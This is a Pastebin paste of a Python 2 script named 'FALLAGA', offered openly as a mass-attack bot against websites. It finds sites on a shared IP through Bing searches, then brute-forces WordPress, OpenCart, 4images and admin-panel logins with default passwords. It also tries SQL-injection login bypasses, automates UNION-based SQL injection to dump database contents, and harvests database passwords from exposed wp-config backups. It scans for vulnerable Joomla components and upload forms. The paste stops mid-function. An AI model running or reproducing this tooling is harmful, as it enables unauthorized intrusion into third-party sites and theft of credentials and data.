Advertisement
CLAYTeaM

bot

Jul 5th, 2016
1,767
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.55 KB | None | 0 0
  1. # -*- coding: utf-8 -*-
  2. '''
  3. FALLAGA Is A Brute Force Bot - Speed Brute Force Attack - Mass Attack - Auto Grabber
  4. You May Change somethings In the Config Zone
  5. Types Of Brute :
  6. 1 ) Wordpress Attack + Auto Grab Username
  7. 2 ) Joomla ! Attack
  8. 3 ) Admin Panel ( All Scripts ) : Attack
  9. 4 ) Anything -_-
  10. 5 ) Open Cart Cms
  11. 7 ) 4images Attacker
  12. 8 ) Check Sqli Vulnerabilities
  13. 9 ) Check Upload Vulnerabilities
  14. 10 ) Grab Users
  15. '''
  16. #!/usr/bin/python
  17. #~~~~~~~~~~~~
  18. #Import Zone
  19. #--
  20. try :
  21. import mechanize
  22. except :
  23. print " |- Please Install Mechanize First !"
  24. #--
  25. import urllib
  26. import urllib2
  27. import httplib
  28. import cookielib
  29. import re
  30. import requests as xsec
  31. from time import sleep
  32. from threading import Thread
  33. import socket
  34. from ftplib import FTP
  35. #~~~~~~~~~~~~
  36. #~Variables And Lists
  37. jcelist = []
  38. bad = [404,403,401,501,406,400,500,301,302]
  39. jolist = []
  40. wplist = []
  41. adlist = []
  42. pmalist = []
  43. oclist = []
  44. fourilist = []
  45. sqlilist = []
  46. upllist = []
  47. users = []
  48. cpusers = []
  49. dachlist = []
  50. sites = []
  51. FCKeditor = []
  52. adsite = []
  53. wpconfigbak = []
  54. urls = []
  55. passwords = ["admin","123123","1234"]
  56. passlist = ["admin"]
  57. #------------------------------------------------------------
  58. joexploits = ['/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20']
  59. com_media_inj = "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=7"
  60. #------------------------------------------------------------
  61. configsinc= ["/config.php.inc","/config.inc","/includes/config.php.inc","/includes/config.inc","/includes/db.inc","/includes/db.php.inc","/admin/includes/config.inc.php"]
  62. configsbak= ["/config.php.bak","/config.bak","/includes/config.php.bak","/includes/config.bak","/includes/db.bak","/includes/db.php.bak","/admin/includes/config.inc.php.bak","/db/db.php.bak","/db/config.php.bak"]
  63. configsbaksym= ["/config.php~","/config~","/includes/config.php~","/includes/config~","/includes/db~","/includes/db.php~","/admin/includes/config.inc.php~","/db/db.php~","/db/config.php~"]
  64. wpbackup = ["/wp-config.php.bak","wp-config.php~","wp-config.php_bak","/wp-config.php-bak"]
  65. dirs = ["/upload/","/uploads/","/documents/","/files/","/resume/","/resumes","/files/","/upload_cv/","/cv_upload/","/pictures/","/hpage/","/files/upload/","/files/uploads/","/upload/files/"]
  66. jot = {'/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1': 'com_fabrik' ,
  67. '/index.php?option=com_jvehicles&task=agentlisting&aid=31337': 'com_Jvehicles',
  68. '/index.php?option=com_virtuemart' : 'com_virtuemart',
  69. '/index.php?option=com_kunena' : 'com_kunena'
  70. }
  71. wpt = {"/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php" : "Creative Contact Form",
  72. "/wp-content/uploads/slideshow-gallery/" : "slideshow gallery",
  73. "/wp-content/uploads/feuGT_uploads/" : "feuGT",
  74. "/themes/dandelion/functions/upload-handler.php" : "dandelion"
  75. }
  76. #---------------------------
  77. error = ["Unknown","SQL","sql"]
  78. admins = []
  79. columns = []
  80. db = []
  81. dumps = []
  82. payload_db = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,database(),0x3c2f666f6e743e)"
  83. payload_tab = "group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)"
  84. final_tab = "+from+information_schema.tables+where+table_schema =database()--"
  85. payload_col = "group_concat(column_name)"
  86. final_col = "+from+information_schema.columns+where+table_schema=database()--"
  87. #------------------------------------------------------------
  88. ips = open("ip.txt","r")
  89. #~~~~~~~~~~~~
  90. #~Config Zone
  91. excpl = False #~extract cpanel users To list
  92. attackfio = True #~Brute force 4images
  93. #~~~~~~~~~~~~
  94. class bcolors:
  95. HEADER = '\033[95m'
  96. OKBLUE = '\033[94m'
  97. OKGREEN = '\033[92m'
  98. WARNING = '\033[93m'
  99. FAIL = '\033[91m'
  100. ENDC = '\033[0m'
  101. CYAN = '\033[96m'
  102. class colors():
  103. PURPLE = '\033[95m'
  104. CYAN = '\033[96m'
  105. DARKCYAN = '\033[36m'
  106. BLUE = '\033[94m'
  107. GREEN = '\033[92m'
  108. YELLOW = '\033[93m'
  109. RED = '\033[91m'
  110. BOLD = '\033[1m'
  111. ENDC = '\033[0m'
  112. #~~~~~~~~~~~~~
  113. def logo():
  114. print bcolors.CYAN+ ''' _
  115.  
  116.  
  117.  
  118. _____ _ _ ______ ____
  119. |_ _| | | | ____| _ \
  120. | | | |__| | |__ | |_) |
  121. | | | __ | __| | _ <
  122. _| |_| | | | |____| |_) |
  123. |_____|_| |_|______|____/
  124.  
  125.  
  126.  
  127.  
  128.  
  129. Private Version
  130. Python B0xT
  131.  
  132.  
  133. '''
  134. logo()
  135. #~~~~~~~~~~~~~
  136. def unique(seq):
  137. seen = set()
  138. return [seen.add(x) or x for x in seq if x not in seen]
  139. #~~~~~~~~~~~~~
  140. def grabjo(ip):
  141. print bcolors.OKBLUE + "|- Grabbing Joomla "
  142. page = 1
  143. while page <= 21:
  144. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+index.php?option=com&count=50&first="+str(page)
  145. openbing = urllib2.urlopen(bing)
  146. readbing = openbing.read()
  147. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  148. for i in range(len(findwebs)):
  149. jmnoclean = findwebs[i]
  150. findjm = re.findall('(.*?)index.php', jmnoclean)
  151. jolist.extend(findjm)
  152.  
  153. page = page + 10
  154. print bcolors.OKGREEN + "|- Grabbed : " + str(len(jolist)) + " Joomla Sites "
  155. #~~~~~~~~~~~~~
  156. def grabwp(ip):
  157. print bcolors.OKBLUE + "|- Grabbing Wordpress "
  158. page = 1
  159. while page <= 21:
  160. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+?page_id=&count=50&first="+str(page)
  161. openbing = urllib2.urlopen(bing)
  162. readbing = openbing.read()
  163. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  164. for i in range(len(findwebs)):
  165. wpnoclean = findwebs[i]
  166. findwp = re.findall('(.*?)\?page_id=', wpnoclean)
  167. wplist.extend(findwp)
  168. page = page + 10
  169. print bcolors.OKGREEN + "|- Grabbed : " + str(len(wplist)) + " Wordpress Sites "
  170. #~~~~~~~~~~~~~
  171. def admingrabber(ip):
  172. try :
  173. print bcolors.OKBLUE + "|- Grabbing Admin Panels "
  174. page = 1
  175. while page <= 21:
  176. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  177. openbing = urllib2.urlopen(bing)
  178. readbing = openbing.read()
  179. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  180. sites = findwebs
  181. for i in sites :
  182. dachlist.append(i)
  183. if len(dachlist) < 5 :
  184. response = urllib2.urlopen(i).read()
  185. admins = re.findall('type="password"',response)
  186. if admins :
  187. adlist.append(i)
  188. page = page + 10
  189. except :
  190. pass
  191. def counta():
  192. seta = unique(adlist)
  193. for admin in seta :
  194. print bcolors.FAIL + "|-> Admin Panel > " + str(admin)
  195. print bcolors.OKGREEN + "|- Grabbed " + str(len(adlist)) + " Admin Panels"
  196. def grabadfs():
  197. sts = unique(sites)
  198. print bcolors.OKBLUE + "|-> Grabbing From sites "
  199. try:
  200. for site in sts :
  201. a=urllib.urlopen(site + "/admin").read()
  202. find = re.findall('type="password"',a)
  203. np = re.findall('name="log"',a)
  204. if find and not np :
  205. print bcolors.FAIL + "|-> admin panel from site > " + str(site) + "/admin/"
  206. adlist.append(str(site) + "/admin/")
  207. except :
  208. pass
  209. #~~~~~~~~~~~~~
  210. def pma(ip):
  211. print bcolors.OKBLUE + "|- GRABBING PHPMYADMIN"
  212. try:
  213. page = 1
  214. while page <= 21:
  215. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+phpmyadmin&count=50&first="+str(page)
  216. openbing = urllib2.urlopen(bing)
  217. readbing = openbing.read()
  218. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  219. sites = findwebs
  220. for i in sites:
  221. response = urllib2.urlopen(i).read()
  222. upl = re.findall('username"',response)
  223. if upl :
  224. pmalist.append(i)
  225. page = page + 10
  226. print bcolors.OKGREEN + "|- Grabbed " + str(len(pmalist)) + " Php My Admin"
  227. except :
  228. pass
  229. #~~~~~~~~~~~~~
  230. def graboc(ip):
  231. print bcolors.WARNING + "|- Grabbing OpenCart"
  232. try:
  233. page = 1
  234. while page <= 21:
  235. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+admin&count=50&first="+str(page)
  236. openbing = urllib2.urlopen(bing)
  237. readbing = openbing.read()
  238. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  239. sites = findwebs
  240. for i in sites:
  241. response = urllib2.urlopen(str(i) ).read()
  242. upl = re.findall('>OpenCart<',response)
  243. if upl :
  244. print bcolors.FAIL + "|-> Open Cart > " + str(i)
  245. oclist.append(i)
  246.  
  247. page = page + 10
  248. print bcolors.OKGREEN + "|- Grabbed " + str(len(oclist)) + " Open Cart Sites"
  249. except :
  250. pass
  251. #~~~~~~~~~~~~~
  252. def grabfour(ip):
  253. print bcolors.OKBLUE + "|- Grabbing OpenCart"
  254. lista = []
  255. page = 1
  256. while page <= 21:
  257. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+powered+by+4images&count=50&first="+str(page)
  258. openbing = urllib2.urlopen(bing)
  259. readbing = openbing.read()
  260. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  261. sites = findwebs
  262. for i in sites:
  263. print bcolors.FAIL + "|-> 4images > " + str(i)
  264. a= i.split("index.php", 2)
  265. fourilist.append(a)
  266. page = page + 10
  267. print bcolors.OKGREEN + "|- Grabbed " + str(len(fourilist)) + " 4images Sites"
  268. def grabsqli(ip):
  269. try :
  270. print bcolors.OKBLUE + "|- Grabbing Sqli "
  271. page = 1
  272. while page <= 21:
  273. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+.php?id=&count=50&first="+str(page)
  274. openbing = urllib2.urlopen(bing)
  275. readbing = openbing.read()
  276. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  277. sites = findwebs
  278. for i in sites :
  279. try :
  280. response = urllib2.urlopen(i).read()
  281. checksqli(i)
  282. except urllib2.HTTPError, e:
  283. str(sites).strip(i)
  284.  
  285. page = page + 10
  286. except :
  287. pass
  288. def checksqli(sqli):
  289. responsetwo = urllib2.urlopen(sqli + "'").read()
  290. find = re.findall("sql",responsetwo)
  291. if find:
  292. sqlilist.append(sqli)
  293.  
  294. def count():
  295. set = unique(sqlilist)
  296. for sqli in set :
  297. print bcolors.FAIL + "|-> Sql Injection > " + str(sqli)
  298. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Sql Injection Sites"
  299. #~~~~~~~~~~~~~
  300. def grabupl(ip):
  301. print bcolors.OKBLUE + "|- Grabbing Uplaods"
  302. try:
  303. page = 1
  304. while page <= 21:
  305. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
  306. openbing = urllib2.urlopen(bing)
  307. readbing = openbing.read()
  308. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  309. sites = findwebs
  310. for i in sites:
  311. response = urllib2.urlopen(i).read()
  312. upl = re.findall('type="file"',response)
  313. if upl :
  314. print bcolors.FAIL + "|-> Upload > " + str(i)
  315. upllist.append(i)
  316. page = page + 10
  317. except :
  318. pass
  319. def countu():
  320. set = unique(upllist)
  321. for upl in set :
  322. print bcolors.FAIL + "|-> Upload > " + str(upl)
  323. print bcolors.OKGREEN + "|- Grabbed " + str(len(set)) + " Upload Sites"
  324. #~~~~~~~~~~~~~
  325. def grabins(ip):
  326. print bcolors.OKBLUE + "|- Grabbing Install"
  327. try:
  328. for wp in wplist :
  329. a=urllib.urlopen(wp + "/wp-admin/install.php").read()
  330. find = re.findall('type="text"',a)
  331. if find :
  332. print bcolors.FAIL + "|-> Install > " + str(wp) + "/wp-admin/install.php"
  333. except :
  334. pass
  335. #~~~~~~~~~~~~~
  336. def grab(site):
  337. try :
  338. sites.append(site)
  339. site1 = site.replace("http://","")
  340. site2 = site1.replace("www.","")
  341. site3 = site2.replace("/","")
  342. site4 = site3.replace("","")
  343. site5,dach = site4.split(".")
  344. if len(users) < 50 :
  345. users.append(site5)
  346. except :
  347. pass
  348. def extractserver(ip):
  349. try:
  350. page = 1
  351. while page <= 21:
  352. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+&count=50&first="+str(page)
  353. openbing = urllib2.urlopen(bing)
  354. readbing = openbing.read()
  355. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  356. sitess = findwebs
  357. for i in sitess:
  358. sites.append(i)
  359. grab(i)
  360. print bcolors.WARNING + "|-> grabbed " + str(len(sites)) + " sites"
  361. page = page + 21
  362. except :
  363. pass
  364.  
  365. def grabcpu(ip):
  366. try :
  367. print bcolors.OKBLUE + "|- Ready To Check " + str(len(users)) + " Users "
  368. for user in unique(users) :
  369. resp = urllib2.urlopen("http://" + ip + '/cgi-sys/guestbook.cgi?user=%s' % user).read()
  370. findcpuser = re.findall(user , resp)
  371. if findcpuser :
  372. print bcolors.FAIL + "|-> Cpanel User > " + user
  373. cpusers.append(user)
  374. except :
  375. pass
  376. print bcolors.FAIL + '|-> Cpanel Not Installed'
  377. def extractcpu():
  378. print bcolors.OKGREEN + "|- Grabbed " + str(len(cpusers)) + " Users"
  379. def extractcpul():
  380. if excpl == False :
  381. for user in cpusers :
  382. with open( 'cpu.txt', 'a') as f:
  383. f.write(user + '\n')
  384. #~~~~~~~~~~~~~
  385. thd = []
  386. def user(site , passlist):
  387. userlist = list()
  388. i = 1
  389. # you can edit to whatever number of users you want to enumerate
  390. while( i <= 5 ) :
  391. url = site + '?author=%i' % i
  392. try:
  393. data = urllib2.urlopen(url).read()
  394. # cleaning the sh*t
  395. re1 = re.findall("<title>(.*?)</title>" , data)
  396. user = re.search("(.*?) |" , re1[0]).group(1)
  397. userlist.append(user)
  398. except:
  399. pass
  400. i += 1
  401. wpbrute(site , userlist, passlist)
  402. return site
  403. def wpbrute(site , userlist , passlist):
  404. for user in userlist:
  405. # if enumeration returns no user
  406. if user == "" :
  407. userlist[0] = "admin"
  408. del userlist[1:]
  409.  
  410. for user in userlist :
  411. for password in passlist:
  412. try:
  413. # found the answer on stackoverflow
  414. cj = cookielib.CookieJar()
  415. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  416. login_data = urllib.urlencode({'log' : user, 'pwd' : password})
  417. opener.open(str(site) + 'wp-login.php', login_data)
  418. resp = opener.open(str(site)+'wp-admin')
  419. final = resp.read()
  420. if '<li id="wp-admin-bar-logout">' in final:
  421. print bcolors.OKGREEN + '\n|-Wordpress | Cracked ' '\n|-Hostname : ' + str(site) + '\n|-Username: ' + str(user) + ' \n|-Password: '+str(password) + '\n'
  422. break
  423.  
  424. except:
  425. pass
  426. def attackwp():
  427. print bcolors.OKGREEN + "|- Brute Forcing Wordpress "
  428. for wp in wplist :
  429. user(wp , passwords)
  430. #~~~~~~~~~~~~~
  431. def getu(line) :
  432. findu = re.findall('name="(.*?)"' , line)
  433. for i in range(len(findu)):
  434. return findu[i]
  435. def getusername(contentHtml):
  436. global username
  437. for line in contentHtml :
  438. findwebs = re.findall('type="text"' , line)
  439. if findwebs :
  440. username = getu(line)
  441. return username
  442. def getpassword(contentHtml):
  443. global passwordinput
  444. for line in contentHtml :
  445. findwebs = re.findall('type="password"' , line)
  446. if findwebs :
  447. passwordinput = getu(line)
  448. return(passwordinput)
  449. def bypasswork():
  450. print bcolors.OKBLUE +"|- Trying To Bypass " + str(len(adlist)) + " Admin Panels "
  451. for ad in adlist:
  452. try:
  453. cj = cookielib.CookieJar()
  454. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  455. login_dat = urllib.urlencode({"username" : "1'or'1", "password" : "1'or'1"})
  456. opener.open(str(ad), login_dat)
  457. response = opener.open(str(ad))
  458. final = response.read()
  459. if 'type="password' in final:
  460. logged = False
  461. else:
  462. print bcolors.OKGREEN + "|- Admin Panel | Bypassed "
  463. print "|- Site -> " + str(ad)
  464. except:
  465. pass
  466.  
  467. def bruteadmin(site,password):
  468. try:
  469. cj = cookielib.CookieJar()
  470. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  471. opener.open(site)
  472. response = opener.open(site)
  473. final = response.readlines()
  474. getusername(final)
  475. getpassword(final)
  476. post = {}
  477. post[username] = "admin"
  478. post[passwordinput] = password
  479. get2 = xsec.post(site, data=urllib.urlencode(post))
  480. get3 = xsec.get(site)
  481. if 'type="password"' in get3.text:
  482. logged = False
  483. else:
  484. print bcolors.OKGREEN + "|- Admin Panel | ATTACKED"
  485. print "|-Site : " + str(site)
  486. print "|-USER : admin"
  487. print "|-Password : " + password
  488.  
  489. except:
  490. print bcolors.FAIL + "|-Fail !"
  491. pass
  492. def brutea():
  493. adlis = unique(adlist)
  494. print bcolors.OKBLUE +"|- Brute Forcing " + str(len(adlis)) + " Admin Panels "
  495. for ad in adlis :
  496. for pwd in passwords :
  497. bruteadmin(ad,pwd)
  498. def inform():
  499. try :
  500. print bcolors.WARNING + "|- Informations "
  501. for ad in adlist :
  502. cj = cookielib.CookieJar()
  503. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  504. opener.open(ad)
  505. response = opener.open(ad)
  506. final = response.readlines()
  507. getusername(final)
  508. getpassword(final)
  509. print bcolors.FAIL + "|-> Host > " + ad
  510. print bcolors.FAIL + "|-> Username Input > " + str(username)
  511. print bcolors.FAIL + "|-> Password Input > " + str(passwordinput)
  512. except :
  513. print bcolors.FAIL + "|->Fail To retrive Data !"
  514. #~~~~~~~~~~~~~
  515. def bruteoc(siteh,passs):
  516. try :
  517. cookie_jar = cookielib.CookieJar()
  518. login_form_seq = [
  519. ('username', 'admin'),
  520. ('password', passs)]
  521. login_form_data = urllib.urlencode(login_form_seq)
  522. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  523. site = opener.open(siteh, login_form_data).read()
  524. if re.search('type="password"',site):
  525. logged = False
  526. else :
  527. print (bcolors.OKGREEN + "|- OpenCart HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  528. except :
  529. pass
  530. def attackoc():
  531. for oc in oclist :
  532. for passs in passwords :
  533. bruteoc(oc,passs)
  534. #~~~~~~~~~~~~~
  535. def brutefi(siteh,passs):
  536. try :
  537. cookie_jar = cookielib.CookieJar()
  538. login_form_seq = [
  539. ('loginusername', 'admin'),
  540. ('loginpassword', passs)]
  541. login_form_data = urllib.urlencode(login_form_seq)
  542. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
  543. site = opener.open(siteh, login_form_data).read()
  544. if re.search('type="password"',site):
  545. logged = False
  546. else :
  547. print (bcolors.OKGREEN + "|- Four Images HACKED \n|- Host : " + str(siteh) + "\n|- Username : admin \n|- Password : " + str(passs))
  548. except :
  549. pass
  550. def attackfi():
  551. for fi in fourilist :
  552. for passs in passwords :
  553. bruteoc(fi,passs)
  554. #~~~~~~~~~~~~~
  555. W = '\033[0m' # white (default)
  556. R = '\033[31m' # red
  557. G = '\033[1;32m' # green bold
  558. O = '\033[33m' # orange
  559. B = '\033[34m' # blue
  560. P = '\033[35m' # purple
  561. C = '\033[36m' # cyan
  562. GR = '\033[37m' # gray
  563. #-------------------------------
  564. def grabuser(victime):
  565. try:
  566. global username
  567. userurl = victime + '?author=1' #~ Get Username By ID
  568. find = urllib2.urlopen(userurl).read()
  569. username = re.search("(.*?) |" , re1[0]).group(1)
  570. except:
  571. username = "admin"
  572. #---------------------------------
  573. def bruteforcer(site,username,password):
  574. try :
  575. cj = cookielib.CookieJar()
  576. opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  577. login_data = urllib.urlencode({'log' : username, 'pwd' : password})
  578. opener.open(str(site) + '/wp-login.php', login_data)
  579. response = opener.open(str(site)+'/wp-admin')
  580. final = response.read()
  581. if '<li id="wp-admin-bar-logout">' in final:
  582. print C + "|------------------------|"
  583. print C + "| Successfully Attacked "
  584. print C + "| Site : " + str(site)
  585. print C + "| User :" + username
  586. print C + "| Pass :" + password
  587. except :
  588. pass
  589. def attackwp():
  590. print bcolors.OKBLUE + "|- Attack wordpress "
  591. for site in wplist :
  592. for passes in passwords :
  593. grabuser(site)
  594. bruteforcer(site,username,passes)
  595. #----------------------------------------------
  596. def jce_checker(joomla):
  597. comjce = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
  598. try:
  599. html = urllib2.urlopen(joomla + comjce).readlines()
  600. for line in html:
  601. if re.findall('Image Manager', line):
  602.  
  603. jcelist.append(joomla)
  604. except urllib2.URLError:
  605. pass
  606. def startjce():
  607. print bcolors.OKBLUE + "|================ Com Jce ================| "
  608. for joom in jolist :
  609. if "http" in joom :
  610. jce_checker(joom)
  611. for jcesite in unique(jcelist ):
  612. print bcolors.FAIL + "|-> JCE > " + str(jcesite)
  613. print bcolors.OKBLUE + "|================ Com Jce ================| "
  614. #~~~~~~~~~~~~~
  615. def grabconfinc():
  616. print bcolors.OKBLUE + "|- Checking From Config Inc files "
  617. for sit in unique(sites) :
  618. for co in configsinc :
  619. ur = urllib.urlopen(sit + co).getcode()
  620. if ur == 200 :
  621. result = urllib2.urlopen(sit + co).read()
  622. find = re.findall("404",result)
  623. if find :
  624. found = False
  625. else :
  626. print bcolors.FAIL + "|-> Config Inc > " + str(sit + co)
  627. def grabconfigbak():
  628. print bcolors.OKBLUE + "|- Checking From Config backup files"
  629. for sit in unique(sites) :
  630. for co in configsbak :
  631. ur = urllib.urlopen(sit + co).getcode()
  632. if ur == 200 :
  633. result = urllib2.urlopen(sit + co).read()
  634. find = re.findall("404",result)
  635. if find :
  636. found = False
  637. else :
  638. print bcolors.FAIL + "|-> Config backup > " + str(sit + co)
  639. def grabconfigsym():
  640. print bcolors.OKBLUE + "|- Checking From Config backup files (With symbols) "
  641. for sit in unique(sites) :
  642. for co in configsbaksym :
  643. ur = urllib.urlopen(sit + co).getcode()
  644. if ur == 200 :
  645. result = urllib2.urlopen(sit + co).read()
  646. find = re.findall("404",result)
  647. if find :
  648. found = False
  649. else :
  650. print bcolors.FAIL + "|-> Config backup with symbol > " + str(sit + co)
  651. def grabconfigwp():
  652. try :
  653. print bcolors.OKBLUE + "|- Checking From Config backup files (wordpress) "
  654. for sit in unique(wplist) :
  655. for co in wpbackup :
  656. ur = urllib.urlopen(sit + co).getcode()
  657. if ur == 200 :
  658. result = urllib2.urlopen(sit + co).read()
  659. find = re.findall("DB_USER",result)
  660. if find :
  661. print bcolors.FAIL + "|-> Wordpress Config > " + str(sit + co)
  662. wpconfigbak.append(sit + co)
  663. except :
  664. pass
  665. #-----------------------------------------
  666. def showdb():
  667. dbu = unique(db)
  668. for d in dbu :
  669. print "|-> Database > " + str(d)
  670. def showtb():
  671. tbu = unique(admins)
  672. print "+---------------------+"
  673. for t in tbu :
  674. if t == "admin" :
  675. print colors.RED + "| " + str(t)
  676. else :
  677. print colors.GREEN + "| " + str(t)
  678. print "+---------------------+"
  679. def showcl():
  680. cl = unique(columns)
  681. print "+---------------------+"
  682. for c in cl :
  683. c,t = c.split(">")
  684. if c == "password" :
  685. print colors.RED + "| " + str(c) + colors.BLUE + " > " + colors.RED + str(t)
  686. else :
  687. print colors.GREEN + "| " + str(c) + colors.BLUE + " > " + colors.RED+ str(t)
  688. print "+---------------------+"
  689. def showdump():
  690. du = unique(dumps)
  691. print "+---------------------+"
  692. for d in du :
  693. print colors.GREEN + "| " + str(d)
  694. print "+---------------------+"
  695. def unstat(stat): #~ Here We Put Our Union Select Statement
  696. global k
  697. plus = int(stat) + 1
  698. n = range(int(plus))
  699. a = str(n).strip('[]')
  700. b = str(a).strip('0,')
  701. k = b.replace(" ", "")
  702. def grabdata(site,inf,col) :
  703. try :
  704. co = col.replace(str(inf),str(payload_db))
  705. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  706. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  707. for i in range(len(findu)):
  708. db.append(findu[i])
  709. except :
  710. pass
  711. def grabtab(site,inf,col):
  712. try :
  713. print colors.CYAN + "|-> Try To get Tables"
  714. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,table_name,0x3c2f666f6e743e)")
  715. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.tables+where+table_schema=database()--").read()
  716. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  717. for i in range(len(findu)):
  718. admins.append(findu[i])
  719. except :
  720. pass
  721. def grabcol(site,inf,col):
  722. try :
  723. print colors.CYAN + "|-> Try To get columns"
  724. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e,column_name,0x3e,table_name,0x3c2f666f6e743e)")
  725. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+information_schema.columns+where+table_schema=database()--").read()
  726. findu = re.findall('<font color="iheb">(.*?)</font>' , resp1)
  727. for i in range(len(findu)):
  728. columns.append(findu[i])
  729.  
  730. except :
  731. pass
  732. def dumpcol(site,inf,col):
  733. column = raw_input(colors.CYAN + "| Column To dump : ")
  734. need,table = column.split(">")
  735. print colors.CYAN + "|-> Try To Dump Column "
  736. co = col.replace(str(inf),"group_concat(0x3c666f6e7420636f6c6f723d2279617373696e6f78223e," + str(need) + ",0x3c2f666f6e743e)")
  737. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "+from+" + str(table)).read()
  738. findu = re.findall('<font color="Iheb0xx">(.*?)</font>' , resp1)
  739. for i in range(len(findu)):
  740. dumps.append(findu[i])
  741.  
  742. def getsqliinfcol(site,num,col):
  743. try:
  744. i = 1
  745. while i < num :
  746. co = col.replace(str(i),"0x79617373696e6f78")
  747. resp1 = urllib2.urlopen(site + "+union+select+" + str(co) + "--").read()
  748. fin = re.findall("Iheb",resp1)
  749. if fin :
  750. print colors.GREEN+ "|-> Infected Column > " + str(i)
  751. grabdata(site,i,col)
  752. showdb()
  753. grabtab(site,i,col)
  754. showtb()
  755. grabcol(site,i,col)
  756. showcl()
  757. dumpcol(site,i,col)
  758. showdump()
  759. i = str(num)
  760. i = i + 1
  761. except urllib2.HTTPError, e:
  762. if e.code == 406 :
  763. print colors.RED + "| Got 406"
  764. if e.code == 403 :
  765. print colors.RED + "|- Got 403" #~Incha2allah Bypass in next version
  766. except :
  767. pass
  768. def getsqlicol(site):
  769. global c
  770. print "|- exploiting Sql Injection "
  771. try :
  772. c = 0
  773. while c < 25 :
  774. response = urllib2.urlopen(site + "+order+by+" + str(c) + "--").read()
  775. sqli = re.findall('SQL',response)
  776. if sqli :
  777. i = False
  778. else :
  779. a = c + 1
  780. response = urllib2.urlopen(site + "+order+by+" + str(a) + "--").read()
  781. for er in error :
  782. sqli = re.findall(er,response)
  783. if sqli :
  784. print colors.GREEN + "|-> Columns Numbers > " + str(c)
  785. num = c
  786. unstat(c)
  787. c = c + 50
  788. break
  789. c = c +1
  790. except :
  791. print colors.RED+ "|- Can't Find Columns number "
  792. pass
  793.  
  794. def exploitsqli() :
  795. sqliss = unique(sqlilist)
  796. for sq in sqliss :
  797. getsqlicol(sq)
  798. getsqliinfcol(sq,c,k)
  799. #-------------------------------------------------
  800. def grabpasswords():
  801. try :
  802. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  803. for conf in wpconfigbak :
  804. reads = urllib2.urlopen(conf).read()
  805. password = re.findall("'DB_PASSWORD', '(.*?)'", reads)
  806. for passs in password :
  807. print bcolors.FAIL + "|-> " + str(passs) + " <-|"
  808. print bcolors.OKBLUE+ "|---------- Grab Passwords----------| "
  809. except :
  810. pass
  811. #-------------------------------------------------
  812. def grabuploadedlink():
  813. try :
  814. for upl in upllist :
  815. site = upl.replace("http://","")
  816. site = re.findall("(.*?)/", site)
  817. final = "http://" + site[0] + "/"
  818. for dir in dirs :
  819. currentcode = urllib.urlopen(final + dir).getcode()
  820. if currentcode == 200 :
  821. print bcolors.OKGREEN + "|- Found Directory > " + str(final + dir)
  822. except :
  823. pass
  824. #-------------------------------------------------
  825. def scanjoomla():
  826. try :
  827. print bcolors.OKBLUE + "|- Scanning Joomla From most Known Components"
  828. for jo in jolist :
  829. for link,name in jot.iteritems() :
  830. currentcodetwo = urllib.urlopen(jo + "/" + str(link)).getcode()
  831. if currentcodetwo == 200 :
  832. jocheck = urllib2.urlopen(jo + "/" + str(link)).read()
  833. found = re.findall(str(name), jocheck)
  834. if found :
  835. print bcolors.FAIL + "|-> Found Joomla " + bcolors.OKGREEN + str(name) + bcolors.FAIL + " In " + bcolors.OKGREEN + str(jo)
  836. except :
  837. pass
  838. #-------------------------------------------------
  839. def check(site):
  840. try :
  841. ur = urllib2.urlopen(site + "/" + com_media_inj).read()
  842. check = re.findall('id="uploadForm" name="uploadForm" method="post" enctype="multipart/form-data">',ur)
  843. if check :
  844. print bcolors.FAIL + "|-> Com Media > " + site
  845. except :
  846. pass
  847. def com_mediascan():
  848. print bcolors.OKBLUE + "|================ Com Media ================| "
  849. for jo in jolist :
  850. check(jo)
  851. print bcolors.OKBLUE + "|================ Com Media ================| "
  852. #-------------------------------------------------
  853. def scanwp():
